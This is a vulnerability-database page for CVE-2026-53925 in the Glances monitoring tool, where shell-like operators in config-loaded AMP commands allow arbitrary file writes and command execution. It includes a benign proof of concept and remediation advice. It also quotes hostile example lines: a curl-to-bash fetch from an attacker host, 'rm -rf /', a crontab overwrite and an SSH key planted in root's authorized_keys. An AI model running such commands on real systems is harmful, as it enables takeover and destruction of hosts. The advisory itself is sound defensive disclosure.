Skip to main content

Glances CVE-2026-53925

| EUVDEUVD-2026-39518 HIGH
Path Traversal (CWE-22)
2026-06-23 https://github.com/nicolargo/glances GHSA-3vwc-qwhc-3mj7
7.8
CVSS 3.1 · Vendor: https://github.com/nicolargo/glances
Share

Severity by source

Vendor (https://github.com/nicolargo/glances) PRIMARY
7.8 HIGH
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
7.8 HIGH

Requires local write access to glances.conf (PR:L) but no user interaction; the operator parsing yields arbitrary file write and command execution as the Glances user, giving full C/I/A impact.

3.1 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
SUSE
HIGH
qualitative

Primary rating from Vendor (https://github.com/nicolargo/glances).

CVSS VectorVendor: https://github.com/nicolargo/glances

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Local
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 23, 2026 - 18:33 vuln.today
Analysis Generated
Jun 23, 2026 - 18:33 vuln.today

DescriptionCVE.org

Summary

The secure_popen() function in glances/secure.py interprets > (file redirection), | (pipe), and && (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command.

When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via >), chain arbitrary commands (via &&), or pipe command output to arbitrary programs (via |).

Crucially, this vulnerability is not mitigated by the --disable-config-exec flag that was introduced to address CVE-2026-33641. That flag only disables backtick command execution in config.get_value(); it does not affect the secure_popen() function's interpretation of shell-like operators.

Details

Affected code path 1 - Default AMP (glances/amps/default/__init__.py:69)

python
res = self.get('command')
# ...
self.set_result(secure_popen(res).rstrip())

The command config value is loaded from [amp_<name>] sections via GlancesAmp.load_config() (glances/amps/amp.py:81):

python
self.configs[param] = config.get_value(amp_section, param).split(',')

Affected code path 2 - SystemV AMP (glances/amps/systemv/__init__.py:60)

python
res = secure_popen(self.get('service_cmd'))

The service_cmd config value is loaded from [amp_systemv] sections via the same GlancesAmp.load_config() method.

Sink - secure_popen() (glances/secure.py:33-77)

The function explicitly parses:

  • > for file redirection (line 39): cmd.split('>') - the path after > is used directly in open(stdout_redirect, "w") (line 71) with no path validation.
  • | for command piping (line 51): cmd.split('|') - each segment is executed as a separate Popen with stdout piped to the next.
  • && for command chaining (line 27 in secure_popen): cmd.split('&&') - each segment is executed sequentially.

None of these operators are sanitized or restricted when loading AMP configuration values.

Why --disable-config-exec does not help:

The --disable-config-exec flag (introduced for CVE-2026-33641) only prevents system_exec() from running backtick-embedded commands in config.get_value(). It does not affect how the resulting string value is processed by secure_popen(). A command value like echo data > /etc/crontab contains no backticks and passes through get_value() unchanged, then secure_popen() interprets the > operator and writes to the arbitrary path.

PoC

Clean-checkout recipe:

  1. Create a test configuration file:
bash
cat > /tmp/poc-glances.conf << 'EOF'
[amp_poc]
enable=true
regex=.*
refresh=3
command=echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp

[outputs]
cors_origins=*
EOF
  1. Run a Python script that simulates the AMP command execution path:
python
import sys
sys.path.insert(0, '/path/to/glances')
from glances.config import Config
from glances.secure import secure_popen
import os
# Load config with --disable-config-exec ACTIVE (CVE-2026-33641 mitigation)
config = Config(config_dir='/tmp/poc-glances.conf', disable_config_exec=True)
# Read AMP command value (same as amp.py load_config)
command = config.get_value('amp_poc', 'command')
print(f'Command: {command!r}')
# Execute (same as amps/default/__init__.py line 69)
marker = '/tmp/cve-poc-marker-amp'
assert not os.path.exists(marker), 'Clean state required'
result = secure_popen(command)
print(f'Result: {result!r}')
# Verify arbitrary file write occurred
assert os.path.exists(marker), 'VULNERABILITY NOT CONFIRMED'
with open(marker) as f:
    content = f.read()
print(f'Written to {marker}: {content!r}')
assert 'POC_ARBITRARY_FILE_WRITE' in content
# Cleanup
os.remove(marker)
print('CONFIRMED: Arbitrary file write via secure_popen > in AMP command')

Expected vulnerable output:

Command: 'echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp'
Result: 'POC_ARBITRARY_FILE_WRITE\n'
Written to /tmp/cve-poc-marker-amp: 'POC_ARBITRARY_FILE_WRITE\n'
CONFIRMED: Arbitrary file write via secure_popen > in AMP command

Negative/control case (demonstrating --disable-config-exec only blocks backticks):

python
# This IS blocked by --disable-config-exec:
# command=`rm -rf /` → get_value() skips backtick execution
# This is NOT blocked by --disable-config-exec:
# command=echo data > /etc/crontab → secure_popen writes to /etc/crontab

Cleanup:

bash
rm -f /tmp/poc-glances.conf /tmp/cve-poc-marker-amp

Impact

An attacker who can modify glances.conf (e.g., through a separate file-write vulnerability, a misconfigured shared filesystem, a configuration management system, or a container volume mount) can:

  1. Write arbitrary content to arbitrary files via the > operator - e.g., overwriting /etc/crontab, ~/.ssh/authorized_keys, or any file writable by the Glances process user.
  2. Execute arbitrary commands via the && and | operators - e.g., echo x && curl http://attacker.com/shell.sh | bash.
  3. Exfiltrate data via the | operator piping command output to network utilities.

The existing --disable-config-exec mitigation for CVE-2026-33641 does not protect against this vulnerability because it operates at a different layer (config.get_value() backtick processing vs. secure_popen() operator interpretation).

Suggested remediation

  1. Remove file redirection support from secure_popen() unless explicitly required. The > operator in __secure_popen() (lines 39-45, 69-72) writes to arbitrary paths. Consider removing this feature or restricting output paths to a safe directory (e.g., a configured output directory with path traversal protection).
  2. Sanitize AMP command values before passing them to secure_popen(). Apply the same sanitization used in actions.py:_sanitize_mustache_dict() to strip &&, |, >>, and > from AMP command and service_cmd config values, or refuse to execute commands containing these operators.
  3. Consider replacing secure_popen() with subprocess.run(shell=False) using explicit argument arrays. The secure_popen() function reimplements shell-like operator parsing (&&, |, >) which is inherently risky. Standard subprocess.run() with shell=False and an explicit argument list avoids this class of vulnerability entirely.
  4. Add a regression test that verifies AMP commands cannot contain file redirection or command chaining operators.

AnalysisAI

Arbitrary file write and command execution in Glances (Python system monitoring tool) versions 4.0.8 through 4.5.4 allows attackers with the ability to modify glances.conf to abuse shell-like operators (>, |, &&) interpreted by the secure_popen() function inside AMP module command configuration. The flaw bypasses the --disable-config-exec mitigation introduced for CVE-2026-33641, since that flag only blocks backtick execution in config.get_value() and not operator parsing in secure_popen(). …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Gain write access to glances.conf
Delivery
Inject `>` or `&&` operator into AMP command value
Exploit
Wait for AMP refresh tick
Install
secure_popen() parses operator without validation
C2
Arbitrary file write or command execution as Glances user
Execute
Establish persistence (cron, authorized_keys)
Impact
Escalate to full host compromise

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to already have write access to the `glances.conf` configuration file consumed by a running Glances instance - typically via a misconfigured shared/NFS filesystem, a writable container volume mount, a compromised configuration-management pipeline, or a separate file-write vulnerability. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 vector AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (7.8 High) accurately reflects that exploitation requires local privileges sufficient to modify `glances.conf` - not a remote unauthenticated path - but yields full triad impact (arbitrary file write as the Glances process user plus arbitrary command chaining). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has gained low-privileged write access to a shared volume mounting `glances.conf` (for example, a co-tenant in a Kubernetes namespace with the same ConfigMap, or a user on a multi-tenant host where Glances runs as root) edits an `[amp_*]` section to set `command=echo ssh-rsa AAAA... attacker@evil >> /root/.ssh/authorized_keys`. …
Remediation Vendor-released patch: upgrade Glances to version 4.5.5 or later (https://github.com/nicolargo/glances/releases/tag/v4.5.5), which also addresses CVE-2026-46606, CVE-2026-46607, CVE-2026-46608, and CVE-2026-46611 shipped in the same release. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

24 HOURS: Audit all Glances deployments (versions 4.0.8-4.5.4) to identify systems where configuration file modification is possible; restrict filesystem permissions on glances.conf to read-only where feasible. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Vendor StatusVendor

SUSE

Severity: Important
Product Status
openSUSE Tumbleweed Fixed

Share

CVE-2026-53925 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy